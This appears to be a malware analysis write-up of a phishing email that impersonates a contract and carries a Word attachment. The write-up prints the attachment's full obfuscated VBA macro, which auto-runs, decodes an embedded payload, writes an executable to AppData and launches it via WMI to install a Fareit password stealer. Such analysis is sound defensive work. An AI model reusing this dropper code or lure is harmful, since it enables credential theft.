The following email was received by a client (email domain redacted to “<DOMAIN>”), with an attachment named “<DOMAIN>_contract.doc”:
From: jiazw@neusoft.com [mailto:jiazw@neusoft.com]
Sent: Wednesday, July 13, 2016 9:29 AM
To: <EMPLOYEE NAME>
Subject: Re: <DOMAIN> contract
I have attached our contract.
Please check it and let me know if you want to add any changes.
Thank you
Jiazhi Williams
Neusoft America Inc.
P: 408.0146124
F: 408.8865348
As expected, this one is yet another Word macro that looks like this:
This document is protected
1 Open the document in Microsoft Office. Previewing online is not available for protected documents.
2 If this document was downloaded from your email, please click “Enable Editing” from the yellow bar above.
3 Once you have enabled editing, please click “Enable Content” from the yellow bar above.
This one was yet again obfuscated VBscript that I didn’t feel like cleaning up (code included below). According to Windows Defender, a file was created that was flagged as “PWS:Win32/Fareit”.
The following error occurred: Error code 0x80508023. The program could not find the malware and other potentially unwanted software on this computer.
Category: Password Stealer
Description: This program is dangerous and captures user passwords.
Recommended action: Remove this software immediately.
Items:
file:C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\3IDCVV6R\pm[1].dllGet more information about this item online.
Forms – Leptinotarsa
Private Sub UserForm_Scroll(ByVal ActionX As MSForms.fmScrollAction, ByVal ActionY As MSForms.fmScrollAction, ByVal RequestDx As Single, ByVal RequestDy As Single, ByVal ActualDx As MSForms.ReturnSingle, ByVal ActualDy As MSForms.ReturnSingle) epistle = dyspeptic.epicure conveyance = Sqr(epistle) conveyance = Round(conveyance) Do While conveyance <> 50 dyspeptic.alosa conveyance = conveyance + 1 Loop End Sub
Microsoft Word Objects – ThisDocument
Sub pegs(undrained)
Dim kwakiutl As Variant
Dim damusque As Variant
Dim phiz As Variant
alectura = alectura / 89
eyes = Lcase("Bl") & Mid("sottishennysubornation", 8, 4)
Close #undrained
novus = Right("chironomidaenonc", 4) + Mid("concordanceompliaascendant", 12, 6) + "nce"
End Sub
Sub CommentsCollectionObject()
Dim MyText As String
Dim MyRange As Object
Set MyRange = ActiveDocument.Range
MyText = "<Replace this with your text>"
' Selection Example:
Selection.Comments.Add Range:=Selection.Range, Text:=MyText
' Range Example:
MyRange.Comments.Add Range:=Selection.Range, Text:=MyText
End Sub
Sub PrintAll()
Dim aDoc As Document
For Each aDoc In Documents
aDoc.PrintOut
Next
End Sub
Function permitted(coloratura) As String
Dim blazing(63) As Long
Dim archangel() As Byte
Dim moll As Integer
novus = StrReverse("ef") + "nder"
Dim ireland(255) As Byte
bureaucrat = bureaucrat Xor 430
Dim coelogyne As Long
Dim genip As String
Dim consecrated As Long
Dim calculation As Long
Dim freeforall(63) As Long
Dim barbarity(63) As Long
Dim fasciculated() As Byte
Dim paretic As Long
boom = 4032
balkiness = 16711680
earner = 65536
abolitionist = 65280
soigne = 262144
situated = 37 + 58 - 75 + 258028
acted = 16515072
astronaut = 18 - 42 - 44 + 4164
andean = 85 - 102 + 80
darlingtonia = 64
hang = 66 + 189
pipile = 23 + 233
Dim meaningful As String
Dim cleaner() As Byte
cleaner = StrConv(coloratura, vbFromUnicode)
Dim heartgrief As Variant
For Click = 0 To UBound(cleaner)
cleaner(Click) = cleaner(Click) + 2 Xor 11
Next Click
riskfree = 72 + 105 - 170
Select Case riskfree
Case 1 To 10
khana = StrReverse("omo") & Left("phagiuncoordinated", 5) & Left("cparoles", 1)
effectuate = "la" & Ucase("Te")
flash = bitterroot
Case 11
anestrus = anestrus - 294
Case 13
hegoat = Right("klanma", 2) & Mid("cumulationttrecoadjuvant", 11, 4)
curio = Left("aminchirology", 4) & Lcase("OACIDUria")
hearken = palish
End Select
bronchocele = StrConv(cleaner, vbUnicode)
moll = 2
buccinidae = 122
For consecrated = 0 To 255
Select Case consecrated
Case 65 To 90
ireland(consecrated) = consecrated - 65
Case 97 To buccinidae
ireland(consecrated) = consecrated - 71
Case 48 To 57
ireland(consecrated) = consecrated + 89 - 32 + 57 - 110
Case 43
ireland(consecrated) = 62
Case 47
ireland(consecrated) = 63
End Select
Next consecrated
For consecrated = 0 To 63
freeforall(consecrated) = consecrated * darlingtonia
barbarity(consecrated) = consecrated * astronaut
blazing(consecrated) = consecrated * soigne
Next consecrated
fasciculated = StrConv(bronchocele, vbFromUnicode)
anteroom = 73 - 69
ReDim archangel((((UBound(fasciculated) + 1) \ anteroom) * 3) - 1)
For paretic = 0 To UBound(fasciculated) Step 4
chelate = fasciculated(paretic)
bufo = 3
calculation = blazing(ireland(chelate)) + barbarity(ireland(fasciculated(paretic + 1))) + _
freeforall(ireland(fasciculated(paretic + 2))) + ireland(fasciculated(paretic + bufo))
consecrated = calculation And balkiness
archangel(coelogyne) = consecrated \ earner
consecrated = calculation And abolitionist
archangel(coelogyne + 1) = consecrated \ pipile
archangel(coelogyne + 2) = calculation And hang
coelogyne = coelogyne + 3
Next paretic
genip = StrConv(archangel, vbUnicode)
If moll Then genip = Left$(genip, Len(genip) - moll)
permitted = genip
End Function
Public Sub AutoOpen()
Dim blessed As String
Dim astonishing As Variant
anestrus = anestrus \ 244
Dim whack As Integer
Dim god As Long
whack = 19 Mod (3)
phosphoprotein = "mestizo"
If whack < 46 - 72 - 384 Then
alectura = alectura * 1
CommentsCollectionObject
Else
Dim quickening As Variant
leptinotarsa.Scroll fmScrollActionNoChange, fmScrollActionEnd
microfiche = 69
tetanus = 75
If microfiche + tetanus < 14 Then
microfiche = Left("hypsimultaneously", 3) & "ervent" & Mid("waiterilationhippophagy", 7, 7)
dekko = Right("cholineev", 2) + Mid("sarsaparillaanascdevon", 13, 5) + Right("distingueence", 4)
Else
tetanus = 94
End If
End If
End Sub
Modules – Dyspeptic
Dim anestrus
Dim bureaucrat As Long
Dim catalatic
Dim alectura As Long
Dim phosphoprotein As String
Dim novus
Sub ToggleTextBoundaries()
If Documents.Count > 0 Then
With ActiveDocument.ActiveWindow.View
.ShowTextBoundaries = Not .ShowTextBoundaries
End With
End If
End Sub
Function elision(below)
Dim austereness As Long
Dim kiosk As String
Dim chemiluminescence As String
winteraceae = StrConv(below, 109 + 4 + 15)
despumate = pretext
badv = mousy
elision = winteraceae
End Function
Sub appropriate(westerly, tonsure)
Dim acculturational As String
Dim cassocked As String
bureaucrat = bureaucrat * 1
Open westerly For Binary Access Read Write As #tonsure
novus = StrReverse("inam") & Mid("onesleffestationaminomethane", 8, 9)
End Sub
Sub chastened(emporium, georgette, dementat)
Dim consumable As Integer
Dim minefield() As Byte
Dim refero As Integer
minefield = elision(emporium)
codon = biplane
mbabane = dementat
Put #mbabane, , minefield
End Sub
Function messily(doggerel)
agranulocytic = 45 + 19
Select Case agranulocytic
Case 64 To 71
anestrus = anestrus - 85
days = Ucase("wi") + Right("andromedanmgmt", 5) + "s:\\"
phosphoprotein = Lcase("IN") & Right("pantyhosesola", 4) & Left("tiondefaced", 4)
deputies = StrReverse("or\.") + Lcase("OT\cImV2")
Case 34 To 37
Dim reductive As Variant
novus = "ste" + Ucase("RcorAR") + Ucase("iUs")
anestrus = anestrus * 3
End Select
phosphoprotein = Left("grsouthernness", 2) & Ucase("umbl") & Mid("elecampaneepeacekeeper", 11, 1)
Set illustrative = GetObject(days + deputies)
peine = Ucase("WiN") + Right("berry32_Process", 10)
Set enured = illustrative.Get(peine)
Set adit = enured.Methods_
bureaucrat = bureaucrat Mod 315
implicational = Ucase("cR") + Ucase("Eate")
novus = Mid("margarinapforwards", 9, 2) & StrReverse("vorp") & StrReverse("la")
computer = 12 - 89 + 129
Select Case computer
Case 17 To 23
Dim kidnapping As String
catalatic = "pop"
phosphoprotein = Ucase("INT") + Lcase("ENtioN") + Mid("tramperallymultangular", 8, 4)
Case 52 To 57
anestrus = anestrus / 322
Set minikin = adit(implicational).InParameters.Spawninstance_
novus = Right("conscriptiondr", 2) & "iven"
minikin.CommandLine = doggerel
End Select
bun = tan(50)
If bun <> 51 Then
illustrative.ExecMethod peine, implicational, minikin
Else
phosphoprotein = "cardroom"
End If
End Function
Sub SortText()
' A macro to sort the selected text, if the user has selected
' more than one paragraph
If Documents.Count > 0 Then
' The user has at least one document open.
If Selection.Paragraphs.Count > 1 Then
' The user has selected more than one paragraph
' of text, so sort it.
Selection.Sort
Else
' Tell the user what to do.
MsgBox "Please select two or more paragraphs and try again."
End If
End If
End Sub
Function epicure()
Dim silurus As Long
Dim casing As String
closegrained = 54 + 123 + 100 + 9723
anestrus = anestrus + 168
catalatic = Lcase("cOB") & Right("carburetoraltit", 5) & Mid("crenulateeaddlepated", 10, 1)
Dim brainpan As String
burked = 96 - 29 + 120 - 87
alectura = alectura Mod 401
Dim capuchin As Integer
usurious = DDB(closegrained, burked, 5, 2)
alectura = alectura And 285
epicure = usurious
End Function
Sub alosa()
anestrus = anestrus / 329
enchant = "misdemeanor"
Dim deciduous As String
bureaucrat = bureaucrat Xor 450
slovenry = 63
Select Case slovenry
Case 63 To 81
alectura = alectura / 233
Dim bereft As String
deciduous = extravaganza
Dim spellbound As Integer
Case 23 To 28
Dim amends As Integer
alectura = alectura + 450
bureaucrat = bureaucrat + 347
Case 15 To 17
Dim paragrapher As Long
bureaucrat = bureaucrat - 484
anestrus = anestrus And 391
End Select
collegian = tan(79)
If collegian <> 52 Then
bereft = deciduous + Mid("tiger\dconnu", 6, 2) + Ucase("yBBu") + Mid("entandrophragmak.exeagreeableness", 16, 5)
fearless = "ex" & Lcase("ORAB") & Right("delegatele", 2)
Else
alectura = alectura + 468
End If
prottagonist = tan(73)
If prottagonist <> 71 Then
curcuitous = FreeFile
catalatic = "sanctus"
slade = 33 + 2 - 102 + 67
Else
bureaucrat = bureaucrat And 158
End If
anestrus = anestrus + 261
eyot = slade
appropriate bereft, curcuitous
passions = leptinotarsa.endocrinology
phosphoprotein = "purchaser"
taxicoach = passions
bureaucrat = bureaucrat + 55
attenuated = ThisDocument.permitted(taxicoach)
inveterate = StrReverse("lb") + "eed"
bellyband = gulfweed
dictate = holloa
mobcap = 119 + 11 - 53
Select Case mobcap
Case 77 To 81
catalatic = "selfluminous"
communication = Len(attenuated)
Dim electrolyze As Long
anestrus = anestrus + 171
Case 37 To 43
Dim aryan As Byte
novus = "sesqui"
anestrus = anestrus * 1
End Select
phosphoprotein = Right("patriarchyre", 2) + Ucase("tren") + Ucase("Ch")
anestrus = anestrus \ 98
abridger = 7 + 16 + 49 - 14
Select Case abridger
Case 58 To 67
bureaucrat = bureaucrat - 135
dyspeptic.chastened attenuated, eyot, curcuitous
novus = "billboard"
Case 36 To 41
Dim shoreless As Long
novus = "archidiskidon"
catalatic = Ucase("PR") & Lcase("OwEs") & Ucase("S")
Case 20 To 24
Dim attitudinize As Byte
alectura = alectura * 1
phosphoprotein = Mid("desmidaecuneiform", 7, 2) & Mid("ognirostaticmaser", 5, 8)
End Select
acaulescent = 17 - 13 + 68
Select Case acaulescent
Case 72 To 79
anestrus = anestrus / 357
novus = Lcase("co") & "bble" & Mid("unattestedrnormalness", 11, 1)
center = curcuitous
ThisDocument.pegs center
Case 24 To 25
Dim nutbrown As Integer
catalatic = "bi" + Left("bliopoledolichocephalic", 8)
alectura = alectura Xor 205
Case 27 To 30
Dim daredevil As Variant
bureaucrat = bureaucrat \ 65
catalatic = Lcase("eD") & Mid("potteryucataerology", 8, 4) & "e"
End Select
phosphoprotein = Mid("notabilityabdoteleprompter", 11, 4) & StrReverse("csonim") & StrReverse("ypo")
dissuaded = tan(68)
If dissuaded <> 51 Then
phosphoprotein = Ucase("CL") + StrReverse("rogna")
messily bereft
Else
anestrus = anestrus - 282
End If
End Sub
Function extravaganza()
Dim debased As String
Dim bonze As Variant
mezereum = Ucase("aP") + "pDat" + Right("circumfusea", 1)
anestrus = anestrus And 499
Dim danaea As Byte
aplysia = Environ(mezereum)
alectura = alectura Mod 101
temperize = Left("noncosmolatry", 3) & StrReverse("ahtel") & Left("lgaum", 1)
extravaganza = aplysia
phosphoprotein = Mid("scadssuassimilation", 6, 2) + Left("bspapluralistic", 4) + Mid("unguiculatecefulfill", 12, 2)
End Function